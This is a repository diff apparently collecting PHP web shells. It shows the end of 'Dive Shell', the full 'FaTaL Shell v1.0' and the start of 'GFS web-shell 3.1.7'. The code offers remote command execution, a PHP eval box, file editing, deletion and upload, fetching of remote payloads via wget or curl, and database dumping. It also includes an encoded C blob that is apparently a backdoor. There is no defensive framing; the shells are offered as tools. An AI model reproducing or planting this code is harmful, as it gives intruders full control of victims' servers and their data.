if (!empty($_REQUEST['command'])) {
|
||||
if (get_magic_quotes_gpc()) {
|
||||
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
|
||||
}
|
||||
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
|
||||
unset($_SESSION['history'][$i]);
|
||||
|
||||
array_unshift($_SESSION['history'], $_REQUEST['command']);
|
||||
|
||||
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
|
||||
|
||||
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
||||
$_SESSION['cwd'] = dirname(__FILE__);
|
||||
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
|
||||
|
||||
if ($regs[1][0] == '/') {
|
||||
|
||||
$new_dir = $regs[1];
|
||||
} else {
|
||||
|
||||
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||
}
|
||||
|
||||
|
||||
while (strpos($new_dir, '/./') !== false)
|
||||
$new_dir = str_replace('/./', '/', $new_dir);
|
||||
|
||||
|
||||
while (strpos($new_dir, '//') !== false)
|
||||
$new_dir = str_replace('//', '/', $new_dir);
|
||||
|
||||
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||
|
||||
if ($new_dir == '') $new_dir = '/';
|
||||
|
||||
|
||||
if (@chdir($new_dir)) {
|
||||
$_SESSION['cwd'] = $new_dir;
|
||||
} else {
|
||||
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||
}
|
||||
|
||||
} else {
|
||||
|
||||
chdir($_SESSION['cwd']);
|
||||
|
||||
$length = strcspn($_REQUEST['command'], " \t");
|
||||
$token = substr($_REQUEST['command'], 0, $length);
|
||||
if (isset($aliases[$token]))
|
||||
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
|
||||
|
||||
$p = proc_open($_REQUEST['command'],
|
||||
array(1 => array('pipe', 'w'),
|
||||
2 => array('pipe', 'w')),
|
||||
$io);
|
||||
|
||||
|
||||
while (!feof($io[1])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
|
||||
while (!feof($io[2])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
|
||||
fclose($io[1]);
|
||||
fclose($io[2]);
|
||||
proc_close($p);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (empty($_SESSION['history'])) {
|
||||
$js_command_hist = '""';
|
||||
} else {
|
||||
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||
}
|
||||
|
||||
|
||||
header('Content-Type: text/html; charset=UTF-8');
|
||||
|
||||
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
|
||||
?>
|
||||
|
||||
<head>
|
||||
<title>Dive Shell - Emperor Hacking Team</title>
|
||||
<link rel="stylesheet" href="Simshell.css" type="text/css" />
|
||||
|
||||
<script type="text/javascript" language="JavaScript">
|
||||
var current_line = 0;
|
||||
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||
var last = 0;
|
||||
|
||||
function key(e) {
|
||||
if (!e) var e = window.event;
|
||||
|
||||
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line++;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
if (e.keyCode == 40 && current_line > 0) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line--;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function init() {
|
||||
document.shell.setAttribute("autocomplete", "off");
|
||||
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||
document.shell.command.focus();
|
||||
}
|
||||
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onload="init()" style="color: #00FF00; background-color: #000000">
|
||||
|
||||
<span style="background-color: #FFFFFF">
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
</span>
|
||||
|
||||
|
||||
|
||||
<p><font color="#FF0000"><span style="background-color: #000000"> Directory: </span> <code>
|
||||
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
|
||||
</font></p>
|
||||
|
||||
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
|
||||
<div style="width: 989; height: 456">
|
||||
<p align="center"><b>
|
||||
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
|
||||
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
|
||||
<input type="submit" value="Submit" /> <font color="#0000FF">
|
||||
</font>
|
||||
<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
|
||||
<?php
|
||||
$lines = substr_count($_SESSION['output'], "\n");
|
||||
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
|
||||
echo rtrim($padding . $_SESSION['output']);
|
||||
?>
|
||||
</textarea> </p>
|
||||
<p class="prompt" align="center">
|
||||
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
|
||||
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
|
||||
<p class="prompt" align="center">
|
||||
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
|
||||
<p class="prompt" align="center">
|
||||
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
|
||||
</font></p>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
|
||||
<p class="prompt" align="center">
|
||||
<b><font color="#000000"> </font><font color="#000000" size="2"> </font>
|
||||
</b></p>
|
||||
|
||||
|
||||
|
||||
</html>
|
2026
xakep-shells/PHP/Dx.php.php.txt
Normal file
2026
xakep-shells/PHP/Dx.php.php.txt
Normal file
File diff suppressed because one or more lines are too long
2031
xakep-shells/PHP/DxShell.php.php.txt
Normal file
2031
xakep-shells/PHP/DxShell.php.php.txt
Normal file
File diff suppressed because one or more lines are too long
283
xakep-shells/PHP/Fatalshell.php.php.txt
Normal file
283
xakep-shells/PHP/Fatalshell.php.php.txt
Normal file
|
@ -0,0 +1,283 @@
|
|||
<?php
|
||||
session_start();
|
||||
error_reporting(E_ALL ^ E_NOTICE);
|
||||
set_magic_quotes_runtime(0);
|
||||
@set_time_limit(0);
|
||||
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
|
||||
@ini_set('max_execution_time',0);
|
||||
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
|
||||
|
||||
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
|
||||
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
|
||||
$version='version 1.0 by FaTaLErrOr';
|
||||
$action=$_POST['action'];
|
||||
$file=$_POST['file'];
|
||||
$dir=$_POST['dir'];
|
||||
$content='';
|
||||
$stdata='';
|
||||
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
|
||||
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
|
||||
$footer='</body></html>';
|
||||
|
||||
$lang=array(
|
||||
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
|
||||
'uploadok'=>'Baþarýyla Yüklendi.',
|
||||
'dircrt'=>'Klasör Oluþturuldu.',
|
||||
'dontlist'=>'Listelenemiyor Ýzin Yok.',
|
||||
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
|
||||
'dirnf'=>'Dizin Bulunamadi.',
|
||||
'filenf'=>'.',
|
||||
'dontwrdir'=>'Sadece Okunabilir.',
|
||||
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
|
||||
'deletefileok'=>'Dosya Silindi.',
|
||||
'deletedirok'=>'Klasör Silindi.',
|
||||
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
|
||||
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
|
||||
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
|
||||
'workdir'=>'Çalýþma Dizini: ',
|
||||
'fullacc'=>'Full Yetki.',
|
||||
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
|
||||
'thisnodir'=>'Klasör Seçin.',
|
||||
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
|
||||
);
|
||||
|
||||
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
|
||||
|
||||
function test_file($file){
|
||||
if(!file_exists($file))$err="1";
|
||||
elseif(!is_file($file)) $err="2";
|
||||
elseif(!is_readable($file))$err="3";
|
||||
elseif(!is_writable($file))$err="4"; else $err="5";
|
||||
return $err;}
|
||||
|
||||
function test_dir($dir){
|
||||
if(!file_exists($dir))$err="1";
|
||||
elseif(!is_dir($dir)) $err="2";
|
||||
elseif(!is_readable($dir))$err="3";
|
||||
elseif(!is_writable($dir))$err="4"; else $err="5";
|
||||
return $err;}
|
||||
|
||||
function perms($file){
|
||||
$perms = fileperms($file);
|
||||
if (($perms & 0xC000) == 0xC000) {$info = 's';}
|
||||
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
|
||||
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
|
||||
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
|
||||
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
|
||||
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
|
||||
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
|
||||
else {$info = 'u';}
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
|
||||
return $info;}
|
||||
|
||||
function view_size($size){
|
||||
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
||||
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
||||
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
||||
else {$size = $size . " B";}
|
||||
return $size;}
|
||||
|
||||
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
|
||||
|
||||
if(isset($dir)){
|
||||
$ts['test']=test_dir($dir);
|
||||
switch($ts['test']){
|
||||
case 1:$stdata.=$lang['dirnf'];break;
|
||||
case 2:$stdata.=$lang['thisnodir'];break;
|
||||
case 3:$stdata.=$lang['dontlist'];break;
|
||||
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
|
||||
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
|
||||
}else $dir=@chdir($dir);
|
||||
|
||||
$dir=getcwd()."/";
|
||||
$dir=str_replace("\\","/",$dir);
|
||||
|
||||
if(isset($file)){
|
||||
$ts['test1']=test_file($file);
|
||||
switch ($ts['test1']){
|
||||
case 1:$stdata.=$lang['filenf'];break;
|
||||
case 2:$stdata.=$lang['isdontfile'];break;
|
||||
case 3:$stdata.=$lang['cantrfile'];break;
|
||||
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
|
||||
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
|
||||
}
|
||||
|
||||
function shell($cmd)
|
||||
{
|
||||
global $lang;
|
||||
$ret = '';
|
||||
if (!empty($cmd))
|
||||
{
|
||||
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
|
||||
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
|
||||
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
|
||||
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
|
||||
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
|
||||
else $ret=$lang['allfuncsh'];
|
||||
}
|
||||
return $ret;
|
||||
}
|
||||
|
||||
function createdir($dir){mkdir($dir);}
|
||||
|
||||
//delete file
|
||||
if($action=="delete"){
|
||||
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
|
||||
}
|
||||
//delete dir
|
||||
if($action=="deletedir"){
|
||||
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
|
||||
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
|
||||
}
|
||||
//shell
|
||||
if($action=="shell"){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"shell\">
|
||||
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
|
||||
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
|
||||
<input type=\"submit\" value=\"Uygula\"></form>";}
|
||||
//editor
|
||||
if($action=="editor"){
|
||||
$stdata.="<form method=POST>
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
|
||||
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
|
||||
function writef($file,$data){
|
||||
$fp = fopen($file,"w+");
|
||||
fwrite($fp,$data);
|
||||
fclose($fp);
|
||||
}
|
||||
function readf($file){
|
||||
clearstatcache();
|
||||
$f=fopen($file, "r");
|
||||
$contents = fread($f,filesize($file));
|
||||
fclose($f);
|
||||
return htmlspecialchars($contents);
|
||||
}
|
||||
if(@$_POST['save'])writef($file,$_POST['data']);
|
||||
if(@$_POST['create'])writef($file,"");
|
||||
$test=test_file($file);
|
||||
if($test==1){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
|
||||
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
|
||||
<input type=\"reset\" value=\"No\"></form>";
|
||||
}
|
||||
if($test>2){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
|
||||
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
|
||||
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
|
||||
}}
|
||||
//viewer
|
||||
if($action=="viewer"){
|
||||
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
|
||||
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
|
||||
if (is_dir($dir)) {
|
||||
if (@$dh = opendir($dir)) {
|
||||
while (($file = readdir($dh)) !== false) {
|
||||
if(filetype($dir . $file)=="dir") $dire[]=$file;
|
||||
if(filetype($dir . $file)=="file")$files[]=$file;
|
||||
}
|
||||
closedir($dh);
|
||||
@sort($dire);
|
||||
@sort($files);
|
||||
if ($GLOBALS['os']==1) {
|
||||
$content.="<tr><td>HDD Secin:";
|
||||
for ($j=ord('C'); $j<=ord('Z'); $j++)
|
||||
if (@$dh = opendir(chr($j).":/"))
|
||||
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
|
||||
$content.="</td></tr>";
|
||||
}
|
||||
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
|
||||
for($i=0;$i<count($dire);$i++) {
|
||||
$link=$dir.$dire[$i];
|
||||
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
|
||||
}
|
||||
for($i=0;$i<count($files);$i++) {
|
||||
$linkfile=$dir.$files[$i];
|
||||
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
|
||||
}
|
||||
$content.="</table>";
|
||||
}}}
|
||||
//downloader
|
||||
if($action=="download"){
|
||||
header('Content-Length:'.filesize($file).'');
|
||||
header('Content-Type: application/octet-stream');
|
||||
header('Content-Disposition: attachment; filename="'.$file.'"');
|
||||
readfile($file);}
|
||||
//phpeval
|
||||
if($action=="phpeval"){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
|
||||
<?php<br>
|
||||
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
|
||||
?><br>
|
||||
<input type=\"submit\" value=\"Uygula\"></form>";
|
||||
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
|
||||
//upload
|
||||
if($action=="upload"){
|
||||
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
|
||||
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
|
||||
<input type=\"hidden\" name=\"action\" value=\"upload\">
|
||||
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
|
||||
if($os==1)$content.=$form_win;
|
||||
if($os==0){
|
||||
$content.=$form_win;
|
||||
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
|
||||
<input type=submit name=upload value=Upload></form></td></tr>';
|
||||
}
|
||||
|
||||
if(isset($_POST['uploadloc'])){
|
||||
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
|
||||
$uploadfile = $dirupload."/".$_POST['filename'];
|
||||
|
||||
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
|
||||
if(file_exists($uploadfile))$content.=$lang['filext'];
|
||||
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
|
||||
$content.=$lang['uploadok'];
|
||||
}
|
||||
|
||||
if(isset($_POST['upload'])){
|
||||
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
|
||||
switch($_POST['with'])
|
||||
{
|
||||
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
|
||||
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
|
||||
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
|
||||
}}}
|
||||
//end function
|
||||
?><?=$header;?>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
.style4 {
|
||||
font-size: x-large;
|
||||
font-weight: bold;
|
||||
}
|
||||
.style5 {color: #FF0000}
|
||||
.style8 {color: #CCFF00}
|
||||
-->
|
||||
</style>
|
||||
|
||||
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
|
||||
<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
|
||||
<p> </p>
|
||||
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
|
||||
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
|
||||
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
|
||||
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
|
||||
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
|
618
xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt
Normal file
618
xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt
Normal file
|
@ -0,0 +1,618 @@
|
|||
<?
|
||||
/*
|
||||
*************************
|
||||
* ###### ##### ###### *
|
||||
* ###### ##### ###### *
|
||||
* ## ## ## *
|
||||
* ## #### ###### *
|
||||
* ## ## #### ###### *
|
||||
* ## ## ## ## *
|
||||
* ###### ## ###### *
|
||||
* ###### ## ###### *
|
||||
* *
|
||||
* Group Freedom Search! *
|
||||
*************************
|
||||
GFS Web-Shell
|
||||
*/
|
||||
error_reporting(0);
|
||||
if($_POST['b_down']){
|
||||
$file=fopen($_POST['fname'],"r");
|
||||
ob_clean();
|
||||
$filename=basename($_POST['fname']);
|
||||
$filedump=fread($file,filesize($_POST['fname']));
|
||||
fclose($file);
|
||||
header("Content-type: application/octet-stream");
|
||||
header("Content-disposition: attachment; filename=\"".$filename."\";");
|
||||
echo $filedump;
|
||||
exit();
|
||||
}
|
||||
if($_POST['b_dtable']){
|
||||
$dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
|
||||
if($dump!=""){
|
||||
header("Content-type: application/octet-stream");
|
||||
header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
|
||||
echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
|
||||
exit();
|
||||
}else
|
||||
die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
|
||||
}
|
||||
set_magic_quotes_runtime(0);
|
||||
set_time_limit(0);
|
||||
ini_set('max_execution_time',0);
|
||||
ini_set('output_buffering',0);
|
||||
if(version_compare(phpversion(), '4.1.0')==-1){
|
||||
$_POST=&$HTTP_POST_VARS;
|
||||
$_GET=&$HTTP_GET_VARS;
|
||||
$_SERVER=&$HTTP_SERVER_VARS;
|
||||
}
|
||||
if (get_magic_quotes_gpc()){
|
||||
foreach ($_POST as $k=>$v){
|
||||
$_POST[$k]=stripslashes($v);
|
||||
}
|
||||
foreach ($_SERVER as $k=>$v){
|
||||
$_SERVER[$k]=stripslashes($v);
|
||||
}
|
||||
}
|
||||
if ($_POST['username']==""){
|
||||
$_POST['username']="root";
|
||||
}
|
||||
////////////////////////////////////////////////////////////////////////////////
|
||||
///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////
|
||||
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
|
||||
$r_act=$_POST['r_act'];
|
||||
$safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà
|
||||
$mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql
|
||||
$curl_on=function_exists('curl_version'); //íàëè÷èå cURL
|
||||
$dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè
|
||||
$HTML=<<<html
|
||||
<html>
|
||||
<head>
|
||||
<title>GFS web-shell ver 3.1.7</title>
|
||||
</head>
|
||||
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
|
||||
html;
|
||||
$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
|
||||
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
|
||||
